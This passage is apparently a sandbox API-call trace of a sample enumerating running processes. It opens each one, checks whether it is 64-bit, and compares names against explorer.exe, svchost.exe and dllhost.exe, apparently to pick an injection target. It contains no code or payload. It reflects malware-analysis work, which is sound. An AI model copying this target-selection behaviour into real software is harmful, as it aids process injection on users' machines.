th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0198.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0198.558] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.558] CloseHandle (hObject=0xd8) returned 1 [0198.558] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0198.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0198.558] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.558] CloseHandle (hObject=0xd8) returned 1 [0198.558] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0198.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0198.559] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.559] CloseHandle (hObject=0xd8) returned 1 [0198.559] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0198.560] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0198.560] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0198.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0198.561] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0198.561] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0198.562] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0198.563] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0198.563] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.563] CloseHandle (hObject=0xd8) returned 1 [0198.563] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0198.563] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0198.564] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.564] CloseHandle (hObject=0xd8) returned 1 [0198.564] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0198.564] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0198.564] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0198.564] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0198.564] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0198.565] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.565] CloseHandle (hObject=0xd8) returned 1 [0198.565] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0198.615] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.615] CloseHandle (hObject=0xd8) returned 1 [0198.615] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0198.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0198.615] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.615] CloseHandle (hObject=0xd8) returned 1 [0198.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0198.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0198.616] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0198.617] CloseHandle (hObject=0xd8) returned 1 [0198.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0198.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0198.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0198.618] CloseHandle (hObject=0xd4) returned 1 [0198.618] Sleep (dwMilliseconds=0x3e8) [0199.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0199.654] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0199.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0199.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0199.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0199.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0199.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0199.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0199.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0199.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0199.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0199.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0199.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0199.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0199.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0199.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0199.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0199.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0199.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0199.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0199.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0199.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.664] CloseHandle (hObject=0xd8) returned 1 [0199.664] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0199.664] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0199.664] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0199.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0199.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0199.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0199.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.665] CloseHandle (hObject=0xd8) returned 1 [0199.665] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0199.665] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0199.665] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0199.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0199.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0199.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0199.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0199.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0199.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.667] CloseHandle (hObject=0xd8) returned 1 [0199.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0199.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0199.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.667] CloseHandle (hObject=0xd8) returned 1 [0199.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0199.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0199.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.668] CloseHandle (hObject=0xd8) returned 1 [0199.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0199.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0199.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.668] CloseHandle (hObject=0xd8) returned 1 [0199.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0199.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0199.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.669] CloseHandle (hObject=0xd8) returned 1 [0199.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0199.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0199.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.670] CloseHandle (hObject=0xd8) returned 1 [0199.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0199.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0199.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.670] CloseHandle (hObject=0xd8) returned 1 [0199.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0199.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0199.671] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.671] CloseHandle (hObject=0xd8) returned 1 [0199.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0199.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0199.671] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.671] CloseHandle (hObject=0xd8) returned 1 [0199.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0199.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0199.672] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.672] CloseHandle (hObject=0xd8) returned 1 [0199.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0199.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0199.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.673] CloseHandle (hObject=0xd8) returned 1 [0199.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0199.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0199.673] IsWow64Process (in: hProcess=0xd8, 